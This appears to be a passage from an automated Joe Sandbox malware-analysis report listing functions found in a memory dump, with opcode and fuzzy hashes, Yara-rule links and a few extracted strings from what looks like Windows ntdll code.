Instruction Fuzzy Hash: 85D01236100249EFCB01DF41C890D9A772AFBD8710F548019FD19076108A31ED62DA90

Function 019A340D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction ID: a91db21ac2d06d1b0e34751504665a416836c809418f46999d3a6f9338136842
Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction Fuzzy Hash: 9DC08C781519816AEF2B5B5AC900B283A98BB00A07FC4019CAB4C694A2C3689A068258

Function 019C3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b7d72839a5c2fc0535c0e914e035c7bf8534eb3b7b5b31eed9e09860598edd7
Instruction ID: 5125b18f8fe32a276a3863284ef92b59ace79d00b7977cb8957a332c4f65f0ca
Opcode Fuzzy Hash: 0b7d72839a5c2fc0535c0e914e035c7bf8534eb3b7b5b31eed9e09860598edd7
Instruction Fuzzy Hash: 5F90022524151802D14071588418707405AD7D0601F55C011E0064554EC6168A6567B2

Function 019C3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d122bebbcd60077cfe7433b5d7e9d9c2a1a8a0f4fc149aa7f14a9d0c74645ae
Instruction ID: 3be8a13b67110459d607d2fc15095be7da53f6c51c7697235fdc50e574b61ea4
Opcode Fuzzy Hash: 2d122bebbcd60077cfe7433b5d7e9d9c2a1a8a0f4fc149aa7f14a9d0c74645ae
Instruction Fuzzy Hash: 8690022520195442D14072584808B0F815997E1202F95C019E4196554DC91589555722

Function 019C4340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f483075e332aed06930220c13e3826241b891f849ccc4a7865095e8cf9da518d
Instruction ID: ac7f64c883476bcb6498e3f41ea0a16a9fc576d0ade2cacb813c1307beed1a10
Opcode Fuzzy Hash: f483075e332aed06930220c13e3826241b891f849ccc4a7865095e8cf9da518d
Instruction Fuzzy Hash: 19900235605910129140715848885468059A7E0301B55C011E0464554DCA148A565362

Function 019C4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd41c0b226ba86c04f1273d0a9d20235b8560d57ffff0f74acfe275fab839ee8
Instruction ID: 6bf681366bcfefc5155f1b9da365879114fbbe6ff5b29c74e394d3cb764eb98c
Opcode Fuzzy Hash: fd41c0b226ba86c04f1273d0a9d20235b8560d57ffff0f74acfe275fab839ee8
Instruction Fuzzy Hash: 8690026560161042414071584808406A059A7E1301395C115E0594560DC6188955936A

Function 019C39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953463aa8426ab639d947011d556c450230c414061c132c9c34230c439d2c9ca
Instruction ID: 19b9136d76d12f329b399170e486cd8b66f0ef78befdfd42b99a50e0b6501116
Opcode Fuzzy Hash: 953463aa8426ab639d947011d556c450230c414061c132c9c34230c439d2c9ca
Instruction Fuzzy Hash: FA90022524556102D150715C44086168059B7E0201F55C021E0854594EC55589556322

Function 019C2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8b3359e10ae3a8037aacaeefe5725a6356d5541299edbdf71d340f8e4bdbef
Instruction ID: e79f0495ce8641705d3a50bd9672486a0717bccb1e51a278cc3329cab73facbb
Opcode Fuzzy Hash: aa8b3359e10ae3a8037aacaeefe5725a6356d5541299edbdf71d340f8e4bdbef
Instruction Fuzzy Hash: 2890023520151802D10471584808686405997D0301F55C011E6064655FD66589917232

Function 019C2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ca034328c5e2a5ac9b9d3758e9ae6d72adc00aa0c37d3d6e4d0eff4e8260ce
Instruction ID: a678532d2cb19470c71f8de12b753595010d79726ff99295ca12c0e257bf40a0
Opcode Fuzzy Hash: 80ca034328c5e2a5ac9b9d3758e9ae6d72adc00aa0c37d3d6e4d0eff4e8260ce
Instruction Fuzzy Hash: AA90023560551802D15071584418746405997D0301F55C011E0064654EC7558B5577A2

Function 019C2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a23f8bf472ebbb5f5ce507975fbb217f0f7024531c3b75d331fb5991f7bdab
Instruction ID: d5f260d93fa3561894786ff209a9a39c2b090c7bdf3d71e9b8ade85a24863e7a
Opcode Fuzzy Hash: 13a23f8bf472ebbb5f5ce507975fbb217f0f7024531c3b75d331fb5991f7bdab
Instruction Fuzzy Hash: 1E90023520151802D1807158440864A405997D1301F95C015E0065654ECA158B5977A2

Function 019C2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b89940c6b4c5b7a007d4b9f459141cc69ff2226d6c176ca2638238598b6f11c6
Instruction ID: e14458ea31126c17132148a44e72647800ad67c98683945c9308a4e667e01611
Opcode Fuzzy Hash: b89940c6b4c5b7a007d4b9f459141cc69ff2226d6c176ca2638238598b6f11c6
Instruction Fuzzy Hash: CC90023520555842D14071584408A46406997D0305F55C011E00A4694ED6258E55B762

Function 019C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115f055c3c64c7dcafb23714675f487b4750213bffca0533faa2e05ec592bca9
Instruction ID: 5c3d3040cfcb2dc340b14686f9f5c61a98ac9c1b0f2d92c8cb7ba681757082ea
Opcode Fuzzy Hash: 115f055c3c64c7dcafb23714675f487b4750213bffca0533faa2e05ec592bca9
Instruction Fuzzy Hash: 359002A5201650924500B2588408B0A855997E0201B55C016E1094560DC52589519236

Function 019C2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 600e36474af6beb2fbc64ceee219ba137b8a00c3d239ed16d5933ca01f094218
Instruction ID: fa47e1b46b20a27666397f56d61b65401e8cfee986221bd0a97c1efbdd44b4ac
Opcode Fuzzy Hash: 600e36474af6beb2fbc64ceee219ba137b8a00c3d239ed16d5933ca01f094218
Instruction Fuzzy Hash: E290043D311510030105F55C070C50740DFD7D5351355C031F1055550DD731CD715333

Function 019C2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f782e808d821f2236ad0bb65d064737073f4ac6e061ea8a1f5138c20e99396d
Instruction ID: 45f6fe78d98e6d048744216be7901d34d9befef7a82b4838a0ae4bd9d1a13a84
Opcode Fuzzy Hash: 1f782e808d821f2236ad0bb65d064737073f4ac6e061ea8a1f5138c20e99396d
Instruction Fuzzy Hash: A7900229221510020145B558060850B4499A7D6351395C015F1456590DC62189655322

Function 019C2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353c6859b01682d039345e4494264dfe06fdd51960215554201bb7ab2d5a6948
Instruction ID: dcdad3090161a7db6a7d9b1ee173edb8b953805646fdbcb3b97295ea63648437
Opcode Fuzzy Hash: 353c6859b01682d039345e4494264dfe06fdd51960215554201bb7ab2d5a6948
Instruction Fuzzy Hash: 2D90023524151402D14171584408606405DA7D0241F95C012E0464554FC6558B56AB62

Function 019C2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1100bc29833c2672f46db25c2ba94c52820379f26dce6971766e944ea244c20
Instruction ID: d9cc174322cc3829fd1e38abaa6e24ca7aada0eff480c5e91cf8ea9bfd701315
Opcode Fuzzy Hash: c1100bc29833c2672f46db25c2ba94c52820379f26dce6971766e944ea244c20
Instruction Fuzzy Hash: AF900225242551525545B1584408507805AA7E0241795C012E1454950DC5269956D722

Function 019C3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
Instruction ID: 01fdd57595e83267e69f51b90bff95307d1789cdac22f672514e2e6832691dfb
Opcode Fuzzy Hash: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
Instruction Fuzzy Hash: C990023520251142954072585808A4E815997E1302B95D415E0055554DC91489615322

Function 019C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44cd5d63fed91b9293e36a3d411b37f6879c6ac4bc0fb4c7d6fb3e54c325df8d
Instruction ID: 4ae93e8e05aee9d25f9bcde0536f779387773c1f6cb614577f3483200256e751
Opcode Fuzzy Hash: 44cd5d63fed91b9293e36a3d411b37f6879c6ac4bc0fb4c7d6fb3e54c325df8d
Instruction Fuzzy Hash: 7C90022D21351002D1807158540C60A405997D1202F95D415E0055558DC91589695322

Function 019C2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0662d54559c6aaff703af87fd5855f0fc667761b5bd0725f811dfe11160f7805
Instruction ID: 9e0fe6adb4c993197f994b4d4e09f4847da119b1cf6be465b0582f9094f43f78
Opcode Fuzzy Hash: 0662d54559c6aaff703af87fd5855f0fc667761b5bd0725f811dfe11160f7805
Instruction Fuzzy Hash: 8B90022520555442D1007558540CA06405997D0205F55D011E10A4595EC6358951A232

Function 019C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363c672b17d3bd38892d0e866547f4ad388982d25f0bb7ee270e4a8526790e84
Instruction ID: b77c03a8c60ba07bd4c216e1afea76bf74c40b62419ed77742342d22190ac7e1
Opcode Fuzzy Hash: 363c672b17d3bd38892d0e866547f4ad388982d25f0bb7ee270e4a8526790e84
Instruction Fuzzy Hash: BB90043530151003D140715C541C707C05DF7F1301F55D011F0454554DDD15CD575333

Function 019C3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
Instruction ID: 5862521e1e696b6547f30c069e261b9582636753c802726e28f66ac63d0e35d8
Opcode Fuzzy Hash: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
Instruction Fuzzy Hash: F890023920151402D51071585808646409A97D0301F55D411E0464558EC65489A1A222

Function 019C2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040ca6bba7caef68bbf5d85b9015da3be974478c3d8f1c375702eb56bd4d9832
Instruction ID: 8d400246359e1d97cbaad85efbfa3bfd99392d7b1208d3881ca6b44da6168614
Opcode Fuzzy Hash: 040ca6bba7caef68bbf5d85b9015da3be974478c3d8f1c375702eb56bd4d9832
Instruction Fuzzy Hash: C790023520151402D1007598540C646405997E0301F55D011E5064555FC66589916232

Function 019C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec5db2eef4dda03bb4bebc538522aac498f9ee1a787c2d0027a9276249bd276
Instruction ID: 6351d9158ab334cd1a819017822c798bccec86e7b36086bf879134d55e447e49
Opcode Fuzzy Hash: 7ec5db2eef4dda03bb4bebc538522aac498f9ee1a787c2d0027a9276249bd276
Instruction Fuzzy Hash: DD90022560551402D1407158541C706406997D0201F55D011E0064554EC6598B5567A2

Function 019C2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1953deb421477a131fadca0b0299fcdd56621531b04321ac96fb119dd99cca
Instruction ID: 112d71d5c833dfdc2ea08151aed440113bec682bb8ac733eba433a93957f05f0
Opcode Fuzzy Hash: 2c1953deb421477a131fadca0b0299fcdd56621531b04321ac96fb119dd99cca
Instruction Fuzzy Hash: 4B90043530151403D100715C550C707405DD7D0301F55D411F047455CFD757CD517333

Function 019C2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef947f9c675ffab374824cabfc6c276f72d2f589ee64615750835b57b45a1f6c
Instruction ID: c25aa850260fe5603b4e0def659b6ca01298c05e4ac714035f1fd1f797d02abb
Opcode Fuzzy Hash: ef947f9c675ffab374824cabfc6c276f72d2f589ee64615750835b57b45a1f6c
Instruction Fuzzy Hash: DE90023520151842D10071584408B46405997E0301F55C016E0164654EC615C9517622

Function 019C2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6fc482c48ab9feceb91626749b97837aefa064bd72302f43203b3138fd988d
Instruction ID: 23bbade60665398ba30cb428d171fd7fcde5b02bc357c42c220a8505eb8e8c6e
Opcode Fuzzy Hash: bf6fc482c48ab9feceb91626749b97837aefa064bd72302f43203b3138fd988d
Instruction Fuzzy Hash: 5790023520191402D1007158481870B405997D0302F55C011E11A4555EC62589516672

Function 019C2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43c380fb6e74ff50d9a5d2ca6ed244e99d88d8b3517fde198a777e50cee11fd
Instruction ID: a52d43c7e73b87aa36572a956ef7e69bea20b09b6fadb015ffdd9f0e96494ab5
Opcode Fuzzy Hash: b43c380fb6e74ff50d9a5d2ca6ed244e99d88d8b3517fde198a777e50cee11fd
Instruction Fuzzy Hash: 44900225601510424140716888489068059BBE1211755C121E09D8550EC55989655766

Function 019C2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60c22fabcb0cfe1d233a7a3b11979ccdd9b12ed0c62ca0ff38a7358d09b3a7a
Instruction ID: 650a5bf164c59d3c5321ac3618841dfe4394b90cd311526ff5a30eb4719dc052
Opcode Fuzzy Hash: b60c22fabcb0cfe1d233a7a3b11979ccdd9b12ed0c62ca0ff38a7358d09b3a7a
Instruction Fuzzy Hash: 8690023520191402D1007158480C747405997D0302F55C011E51A4555FC665C9916632

Function 019C2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f52e41b466f3e322fda6fe3e862f4b841ab19449f39bc2bc1ea514934d20c6c
Instruction ID: 6b24b3112f6e123acd5ecb712ba7c6322ea9076fe4d0ab7007f50286b2e5fad7
Opcode Fuzzy Hash: 2f52e41b466f3e322fda6fe3e862f4b841ab19449f39bc2bc1ea514934d20c6c
Instruction Fuzzy Hash: DF900225211D1042D20075684C18B07405997D0303F55C115E0194554DC91589615622

Function 019C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32333cf07eeee60f74a8f2657bc1eb1e0db212e3ddea021665058ea99ca05337
Instruction ID: f68a40978dcd88bb94e3d8068f94fdf4614aeeb4cbefcc0055a4b063f73bb09a
Opcode Fuzzy Hash: 32333cf07eeee60f74a8f2657bc1eb1e0db212e3ddea021665058ea99ca05337
Instruction Fuzzy Hash: 9B90026534151442D10071584418B064059D7E1301F55C015E10A4554EC619CD526227

Function 019C2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea180939a65dd7d020975ea1230f6670ce9b8f659efcde165be2e302ca254570
Instruction ID: b857f34c96f8514ac7fa7d2dc77e793c59e67417b3e981f3a4edc942b1719e5a
Opcode Fuzzy Hash: ea180939a65dd7d020975ea1230f6670ce9b8f659efcde165be2e302ca254570
Instruction Fuzzy Hash: 3390026521151042D10471584408706409997E1201F55C012E2194554DC5298D615226

Function 019C2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b6adc3ef4bd48374f8a2e72e2a0cfde07ab62e17489f6f687bce0c04133aae
Instruction ID: fe050fb4e6ee3e9668c02118a07029c41cc0fbb5b04d6b58b1696cb384ea8cd8
Opcode Fuzzy Hash: 31b6adc3ef4bd48374f8a2e72e2a0cfde07ab62e17489f6f687bce0c04133aae
Instruction Fuzzy Hash: 0C90022560151502D10171584408616405E97D0241F95C022E1064555FCA258A92A232

Function 019C2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73752fbdf876ef544cb49b37d239347306db81591ab95d0fe4431274761d6fb7
Instruction ID: d26677654e941c34f8a3129b81e81f4dac6f4605a6e62d8e4b7d51b1a54c88f1
Opcode Fuzzy Hash: 73752fbdf876ef544cb49b37d239347306db81591ab95d0fe4431274761d6fb7
Instruction Fuzzy Hash: F590027520151402D14071584408746405997D0301F55C011E50A4554FC6598ED56766

Function 019C2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88408605106e70ea55c2bbb6cf8754d8bd8aaf3d0058e5aecfb1afd914cd21c5
Instruction ID: e1a6c7c6c6bfa9ea053dd2f4d49f5948f0046de960fe82953ac29fd9a51dc3ea
Opcode Fuzzy Hash: 88408605106e70ea55c2bbb6cf8754d8bd8aaf3d0058e5aecfb1afd914cd21c5
Instruction Fuzzy Hash: 1690026520191403D14075584808607405997D0302F55C011E20A4555FCA298D516236

Function 019C2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2160912a8d8bef4f69023aff85e5bf09481a3a3958778658d99e92f201dea2f
Instruction ID: 2c32f3c631173e29b53e2c23301e06e90e0e535c71c9251b74d58e31216b1d62
Opcode Fuzzy Hash: f2160912a8d8bef4f69023aff85e5bf09481a3a3958778658d99e92f201dea2f
Instruction Fuzzy Hash: 0690022530151402D10271584418606405DD7D1345F95C012E1464555EC6258A53A233

Function 019C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 43c683df09aab794adfa1a4cb48f3dea64bd3df98f4f26d5149249ec5ab77c83
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 019C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019C293C
___swprintf_l.LIBCMT ref: 019C295E
___swprintf_l.LIBCMT ref: 019C29A3
___swprintf_l.LIBCMT ref: 019FA52E

Strings

:%u.%u.%u.%u, xrefs: 019FA5B8
::%hs%u.%u.%u.%u, xrefs: 019FA527
ffff:, xrefs: 019FA504
::ffff:0:%u.%u.%u.%u, xrefs: 019FA54E

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
Instruction ID: 88b81df4f083abb3a59027d6bce9cf9f09ca10dfc85352901496947e2cfd0788
Opcode Fuzzy Hash: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
Instruction Fuzzy Hash: A751D5B6A00116BFDB11DF9CC99097EFBB8BB48641B14C12DE5ADD7642D334DE4087A1

Function 019B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019F4725
CLIENT(ntdll): Processing section info %ws..., xrefs: 019F4787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019F4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019F4655
Execute=1, xrefs: 019F4713
ExecuteOptions, xrefs: 019F46A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019F46FC

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
Instruction ID: 47048274a5cdbb71085f260ada55b99ffa0f97f27bf531e215e7e6fc89041843
Opcode Fuzzy Hash: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
